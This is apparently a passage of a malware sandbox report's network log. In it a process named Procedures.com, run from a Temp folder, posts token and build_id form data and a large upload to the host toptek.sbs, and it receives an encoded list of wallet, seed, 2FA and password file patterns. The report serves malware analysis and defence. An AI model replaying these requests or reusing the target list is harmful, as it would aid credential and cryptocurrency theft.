                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:44 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 4b 36 58 54 30 5a 55 53 52 31 4e 37 59 55 33 57 54 32 36 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 65 38 32 62 32 38 63 66 63 32 36 64 35 61 61 35 30 32 39 32 66 36 35 35 33 30 36 35 33 30 32 0d 0a 2d 2d 2d 2d 2d 2d 4b 36 58 54 30 5a 55 53 52 31 4e 37 59 55 33 57 54 32 36 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 4b 36 58 54 30 5a 55 53 52 31 4e 37 59 55 33 57 54 32 36 50 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                  Data Ascii: ------K6XT0ZUSR1N7YU3WT26PContent-Disposition: form-data; name="token"0e82b28cfc26d5aa50292f6553065302------K6XT0ZUSR1N7YU3WT26PContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------K6XT0ZUSR1N7YU3WT26PCont
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:44 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 05:24:44 GMT
                                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:44 UTC1524INData Raw: 35 65 38 0d 0a 52 45 56 54 53 31 52 50 55 48 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 69 6f 73 4b 6e 4e 6c 5a 57 51 71 4c 69 6f 73 4b 6d 4a 30 59 79 6f 75 4b 69 77 71 61 32 56 35 4b 69 34 71 4c 43 6f 79 5a 6d 45 71 4c 69 6f 73 4b 6d 4e 79 65 58 42 30 62 79 6f 75 4b 69 77 71 59 32 39 70 62 69 6f 75 4b 69 77 71 63 48 4a 70 64 6d 46 30 5a 53 6f 75 4b 69 77 71 4d 6d 5a 68 4b 69 34 71 4c 43 70 68 64 58 52 6f 4b 69 34 71 4c 43 70 73 5a 57 52 6e 5a 58 49 71 4c 69 6f 73 4b 6e 52 79 5a 58 70 76 63 69 6f 75 4b 69 77 71 63 47 46 7a 63 79 6f 75 4b 69 77 71 64 32 46 73 4b 69 34 71 4c 43 70 31 63 47 4a 70 64 43 6f 75 4b 69 77 71 59 6d 4e 6c 65 43 6f 75 4b 69 77 71 59 6d 6c 30 61 47 6c 74 59 69 6f 75 4b 69 77 71 61 47 6c 30 59 6e
                                                                                                                                                                                                                                                                                                  Data Ascii: 5e8REVTS1RPUHwlREVTS1RPUCVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiouKiwqaGl0Yn


                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                  42192.168.2.55003620.42.73.244436772C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:44 UTC1033OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734931481674&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                                  Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                  Content-Length: 9876
                                                                                                                                                                                                                                                                                                  sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                  Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                                                  Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                  Cookie: USRLOC=; MUID=2DB99B69D85C6DF817C28E37D9F46CAD; _EDGE_S=F=1&SID=0A0B2915223862D112663C4B235E6391; _EDGE_V=1; msnup=
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:44 UTC9876OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 43 6f 6e 74 65 6e 74 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 32 2d 32 33 54 30 35 3a 32 34 3a 34 31 2e 36 37 33 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 35 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 66 38 66 35 39 31 39 39 2d 31 66 61 64 2d 34 64 64 65 2d 61 38 64 63 2d 37 37 65 62 36 30 66 62 64 66 32 36 22 2c 22 65 70 6f 63 68 22 3a 22 34 31 35 33 32 34 30 31 37 38 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63
                                                                                                                                                                                                                                                                                                  Data Ascii: {"name":"MS.News.Web.ContentView","time":"2024-12-23T05:24:41.673Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":5,"installId":"f8f59199-1fad-4dde-a8dc-77eb60fbdf26","epoch":"4153240178"},"app":{"loc
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:44 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                                                                  Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                  P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                                  Set-Cookie: MC1=GUID=99fbc087c21545c4b9e1fc256f6387ff&HASH=99fb&LV=202412&V=4&LU=1734931484355; Domain=.microsoft.com; Expires=Tue, 23 Dec 2025 05:24:44 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                  Set-Cookie: MS0=190a28ee68cc447ea409b39585e1c5c4; Domain=.microsoft.com; Expires=Mon, 23 Dec 2024 05:54:44 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                  time-delta-millis: 2681
                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                  Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 05:24:44 GMT
                                                                                                                                                                                                                                                                                                  Connection: close


                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                  43192.168.2.55004494.130.188.574431576C:\Users\user\AppData\Local\Temp\139308\Procedures.com
                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:46 UTC322OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----O8GDJEKN7YCJEUK6P8GV
                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                  Host: toptek.sbs
                                                                                                                                                                                                                                                                                                  Content-Length: 453
                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:46 UTC453OUTData Raw: 2d 2d 2d 2d 2d 2d 4f 38 47 44 4a 45 4b 4e 37 59 43 4a 45 55 4b 36 50 38 47 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 65 38 32 62 32 38 63 66 63 32 36 64 35 61 61 35 30 32 39 32 66 36 35 35 33 30 36 35 33 30 32 0d 0a 2d 2d 2d 2d 2d 2d 4f 38 47 44 4a 45 4b 4e 37 59 43 4a 45 55 4b 36 50 38 47 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 4f 38 47 44 4a 45 4b 4e 37 59 43 4a 45 55 4b 36 50 38 47 56 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                  Data Ascii: ------O8GDJEKN7YCJEUK6P8GVContent-Disposition: form-data; name="token"0e82b28cfc26d5aa50292f6553065302------O8GDJEKN7YCJEUK6P8GVContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------O8GDJEKN7YCJEUK6P8GVCont
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:47 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 05:24:47 GMT
                                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:47 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                  Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                  44192.168.2.55005694.130.188.574431576C:\Users\user\AppData\Local\Temp\139308\Procedures.com
                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:49 UTC324OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----4WT2VKNOZMO8QIWT2VSR
                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                  Host: toptek.sbs
                                                                                                                                                                                                                                                                                                  Content-Length: 98233
                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:49 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 34 57 54 32 56 4b 4e 4f 5a 4d 4f 38 51 49 57 54 32 56 53 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 65 38 32 62 32 38 63 66 63 32 36 64 35 61 61 35 30 32 39 32 66 36 35 35 33 30 36 35 33 30 32 0d 0a 2d 2d 2d 2d 2d 2d 34 57 54 32 56 4b 4e 4f 5a 4d 4f 38 51 49 57 54 32 56 53 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 34 57 54 32 56 4b 4e 4f 5a 4d 4f 38 51 49 57 54 32 56 53 52 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                  Data Ascii: ------4WT2VKNOZMO8QIWT2VSRContent-Disposition: form-data; name="token"0e82b28cfc26d5aa50292f6553065302------4WT2VKNOZMO8QIWT2VSRContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------4WT2VKNOZMO8QIWT2VSRCont
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:49 UTC16355OUTData Raw: 55 55 55 55 41 46 46 46 46 41 42 53 55 74 46 41 43 55 55 55 55 41 46 4a 53 30 55 41 4a 52 52 52 51 41 55 6c 4c 52 51 41 6c 46 46 46 41 42 52 52 52 51 41 55 55 55 55 41 46 42 6f 6f 4e 41 43 55 55 55 55 41 46 46 46 46 41 43 55 55 74 4a 51 41 6c 46 4c 52 51 41 6c 46 46 46 41 42 52 52 52 51 41 6c 46 46 46 41 42 52 52 52 51 41 6c 46 46 46 41 42 52 52 52 51 41 6c 46 46 46 41 42 53 47 6c 70 44 51 41 55 55 55 55 41 46 4a 53 30 6c 41 42 51 61 4b 4b 41 45 6f 70 61 53 67 41 6f 6f 6f 6f 41 4b 53 6c 6f 6f 41 53 69 69 69 67 42 4b 4b 57 6b 6f 41 4b 4b 4b 4b 41 45 6f 6f 6f 6f 41 4b 53 6c 70 4b 41 43 6b 70 61 53 67 41 6f 6f 6f 6f 41 31 36 4b 4b 4b 41 43 69 69 69 67 41 6f 6f 6f 6f 41 53 76 4d 66 69 55 76 38 41 59 2f 69 7a 77 78 34 6d 58 68 49 70 78 62 7a 74 2f 73 35 7a 2f
                                                                                                                                                                                                                                                                                                  Data Ascii: UUUUAFFFFABSUtFACUUUUAFJS0UAJRRRQAUlLRQAlFFFABRRRQAUUUUAFBooNACUUUUAFFFFACUUtJQAlFLRQAlFFFABRRRQAlFFFABRRRQAlFFFABRRRQAlFFFABSGlpDQAUUUUAFJS0lABQaKKAEopaSgAooooAKSlooASiiigBKKWkoAKKKKAEooooAKSlpKACkpaSgAooooA16KKKACiiigAooooASvMfiUv8AY/izwx4mXhIpxbzt/s5z/
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:49 UTC16355OUTData Raw: 58 74 35 66 52 74 48 6d 5a 34 57 4f 6c 7a 56 62 64 69 56 66 61 70 56 2b 74 51 67 31 49 44 58 71 4a 48 46 59 6e 55 38 31 4b 6f 79 61 69 58 72 55 79 34 37 35 6f 73 5a 76 79 46 78 6e 33 71 49 75 38 54 5a 51 6b 56 30 57 6c 65 48 70 62 77 43 57 34 4a 53 49 39 42 33 4e 64 52 44 34 61 30 6c 49 67 72 57 6f 6b 39 53 35 35 72 68 72 59 36 6c 42 38 75 35 32 55 73 42 55 71 4b 37 30 4f 4a 73 72 78 5a 78 74 59 34 63 56 63 48 31 72 62 31 48 77 66 61 4d 50 4f 73 43 59 5a 6c 35 41 37 47 73 44 4d 6b 55 6a 52 54 4c 74 6b 55 34 59 56 35 39 53 74 43 57 73 54 48 45 59 57 56 46 33 65 78 4d 4b 73 78 4e 7a 56 51 4e 79 4b 6d 6a 50 4e 65 64 56 6c 71 63 36 4e 69 32 63 35 46 62 31 72 4a 6c 4b 35 6d 32 62 70 57 37 5a 53 56 77 54 33 4c 6a 6f 58 37 75 50 7a 37 4f 52 44 32 55 6b 66 57 75
                                                                                                                                                                                                                                                                                                  Data Ascii: Xt5fRtHmZ4WOlzVbdiVfapV+tQg1IDXqJHFYnU81KoyaiXrUy475osZvyFxn3qIu8TZQkV0WleHpbwCW4JSI9B3NdRD4a0lIgrWok9S55rhrY6lB8u52UsBUqK70OJsrxZxtY4cVcH1rb1HwfaMPOsCYZl5A7GsDMkUjRTLtkU4YV59StCWsTHEYWVF3exMKsxNzVQNyKmjPNedVlqc6Ni2c5Fb1rJlK5m2bpW7ZSVwT3LjoX7uPz7ORD2UkfWu
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:49 UTC16355OUTData Raw: 4c 77 73 59 6a 79 55 75 4a 6c 7a 39 4a 47 72 71 5a 66 38 41 56 50 37 71 66 35 56 7a 50 77 2f 50 2f 45 69 6e 2f 77 43 76 79 66 38 41 39 47 4e 51 42 31 66 57 69 6c 48 53 69 67 42 4b 4b 4b 4b 41 43 6b 6f 70 61 41 45 78 53 55 74 4c 51 41 32 6b 7a 54 73 55 6d 4b 41 4f 48 31 35 64 33 6a 37 54 51 41 54 2b 37 42 50 48 75 61 36 31 77 32 7a 39 32 71 37 6a 30 7a 58 4f 61 68 6b 66 45 4b 7a 32 70 76 50 32 5a 75 50 7a 72 6f 50 4e 75 63 38 32 35 78 37 4d 4b 74 45 4d 57 52 6c 69 69 33 4f 42 6e 67 48 61 4b 52 49 59 34 77 46 7a 79 54 6e 6b 30 65 5a 50 2f 77 41 2b 72 66 38 41 66 61 31 45 42 4f 58 4c 79 51 4d 78 42 79 76 7a 44 69 71 4a 4c 47 7a 50 51 44 30 36 30 30 49 33 6e 4e 6b 4c 73 2f 68 48 70 51 5a 4a 2b 76 32 5a 76 2b 2b 68 52 35 73 2f 48 2b 6a 4e 7a 2f 74 69 67 43 4e
                                                                                                                                                                                                                                                                                                  Data Ascii: LwsYjyUuJlz9JGrqZf8AVP7qf5VzPw/P/Ein/wCvyf8A9GNQB1fWilHSigBKKKKACkopaAExSUtLQA2kzTsUmKAOH15d3j7TQAT+7BPHua61w2z92q7j0zXOahkfEKz2pvP2ZuPzroPNuc825x7MKtEMWRlii3OBngHaKRIY4wFzyTnk0eZP/wA+rf8Afa1EBOXLyQMxByvzDiqJLGzPQD0600I3nNkLs/hHpQZJ+v2Zv++hR5s/H+jNz/tigCN
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:49 UTC16355OUTData Raw: 70 78 64 6d 6d 4e 53 6c 73 39 6a 48 62 56 72 39 4a 4d 4e 5a 6c 6c 55 34 4f 31 54 79 66 38 4d 59 71 5a 74 59 6d 55 74 2f 6f 45 70 41 58 63 4d 44 72 57 76 67 65 67 78 52 67 65 67 34 36 56 73 68 47 44 4c 72 56 32 34 68 4d 46 6c 49 43 78 47 34 4d 4f 67 72 63 58 4a 55 45 39 78 54 73 44 47 4f 50 79 6f 41 34 70 67 4a 53 5a 70 39 4a 69 67 44 6b 37 67 2f 38 58 4c 73 76 2b 76 52 76 36 31 31 31 63 66 65 6e 62 38 53 62 48 2f 72 30 62 2b 74 64 50 35 68 39 61 41 4c 4f 52 54 66 78 71 44 7a 50 65 6b 33 6d 67 43 63 39 61 53 6f 64 35 6f 38 77 30 41 53 45 6d 6d 6d 6f 7a 49 61 54 64 51 41 2b 6b 4a 46 4d 4a 4e 4d 4c 55 41 50 4c 55 77 6d 6d 46 36 4e 31 41 44 73 30 30 6d 6d 6c 71 61 57 6f 41 63 54 54 53 61 61 54 52 6e 69 67 42 63 30 32 6b 7a 53 5a 6f 41 55 6d 6d 35 70 43 61 54
                                                                                                                                                                                                                                                                                                  Data Ascii: pxdmmNSls9jHbVr9JMNZllU4O1Tyf8MYqZtYmUt/oEpAXcMDrWvgegxRgeg46VshGDLrV24hMFlICxG4MOgrcXJUE9xTsDGOPyoA4pgJSZp9JigDk7g/8XLsv+vRv6111cfenb8SbH/r0b+tdP5h9aALORTfxqDzPek3mgCc9aSod5o8w0ASEmmmozIaTdQA+kJFMJNMLUAPLUwmmF6N1ADs00mmlqaWoAcTTSaaTRnigBc02kzSZoAUmm5pCaT
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:49 UTC16355OUTData Raw: 49 72 68 6c 74 35 70 2f 47 46 6e 64 4a 70 51 67 6b 2b 33 53 72 63 46 64 4e 6c 44 6d 50 5a 49 75 58 75 53 64 72 71 33 79 6b 4b 42 67 5a 55 5a 34 35 62 46 59 57 2b 6e 36 4a 4c 59 4c 6f 4b 4b 57 31 47 58 37 51 58 30 75 53 61 4e 55 33 79 4e 47 78 6a 51 44 7a 6c 78 74 41 77 53 46 79 44 78 6a 46 48 53 34 33 76 62 2b 75 76 2b 52 36 46 52 58 50 2b 43 34 5a 37 66 77 36 73 4d 38 54 52 62 4c 69 66 79 30 61 46 6f 51 45 38 78 69 75 45 59 6b 71 75 4d 59 47 54 67 59 72 6f 4b 47 49 4b 4b 4b 4b 41 43 69 69 69 67 41 6f 6f 6f 6f 41 4b 4b 4b 4b 41 43 69 69 69 67 41 6f 6f 6f 6f 41 4b 4b 4b 4b 41 43 69 69 69 67 41 6f 6f 6f 6f 41 66 52 53 55 55 41 46 46 46 46 41 42 53 64 71 57 6b 6f 41 57 6b 6f 6f 6f 41 4b 4b 53 69 67 42 61 53 69 69 67 41 6f 6f 6f 6f 41 4b 4b 53 69 67 42 61 4b
                                                                                                                                                                                                                                                                                                  Data Ascii: Irhlt5p/GFndJpQgk+3SrcFdNlDmPZIuXuSdrq3ykKBgZUZ45bFYW+n6JLYLoKKW1GX7QX0uSaNU3yNGxjQDzlxtAwSFyDxjFHS43vb+uv+R6FRXP+C4Z7fw6sM8TRbLify0aFoQE8xiuEYkquMYGTgYroKGIKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAfRSUUAFFFFABSdqWkoAWkoooAKKSigBaSiigAooooAKKSigBaK
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:49 UTC103OUTData Raw: 6d 7a 74 35 33 6a 74 31 6a 49 78 35 61 78 67 37 51 75 4f 4d 59 36 56 7a 39 46 46 4d 41 71 35 4a 2f 79 42 62 58 2f 72 34 6d 2f 39 42 6a 71 6e 56 79 54 2f 41 4a 41 74 72 2f 31 38 54 66 38 41 6f 4d 64 41 48 2f 2f 5a 0d 0a 2d 2d 2d 2d 2d 2d 34 57 54 32 56 4b 4e 4f 5a 4d 4f 38 51 49 57 54 32 56 53 52 2d 2d 0d 0a
                                                                                                                                                                                                                                                                                                  Data Ascii: mzt53jt1jIx5axg7QuOMY6Vz9FFMAq5J/yBbX/r4m/9BjqnVyT/AJAtr/18Tf8AoMdAH//Z------4WT2VKNOZMO8QIWT2VSR--
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:51 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 05:24:50 GMT
                                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:51 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                  Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                  45192.168.2.55006794.130.188.574431576C:\Users\user\AppData\Local\Temp\139308\Procedures.com
                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:52 UTC322OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----58Y5FK6F37QIE37Q1NGL
                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                  Host: toptek.sbs
                                                                                                                                                                                                                                                                                                  Content-Length: 331
                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:52 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 35 38 59 35 46 4b 36 46 33 37 51 49 45 33 37 51 31 4e 47 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 65 38 32 62 32 38 63 66 63 32 36 64 35 61 61 35 30 32 39 32 66 36 35 35 33 30 36 35 33 30 32 0d 0a 2d 2d 2d 2d 2d 2d 35 38 59 35 46 4b 36 46 33 37 51 49 45 33 37 51 31 4e 47 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 35 38 59 35 46 4b 36 46 33 37 51 49 45 33 37 51 31 4e 47 4c 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                  Data Ascii: ------58Y5FK6F37QIE37Q1NGLContent-Disposition: form-data; name="token"0e82b28cfc26d5aa50292f6553065302------58Y5FK6F37QIE37Q1NGLContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------58Y5FK6F37QIE37Q1NGLCont
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:53 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 05:24:53 GMT
                                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                  46192.168.2.55007694.130.188.574431576C:\Users\user\AppData\Local\Temp\139308\Procedures.com
                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:54 UTC322OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----7YCBIE37YCBAIEC26FCB
                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                  Host: toptek.sbs
                                                                                                                                                                                                                                                                                                  Content-Length: 331
                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
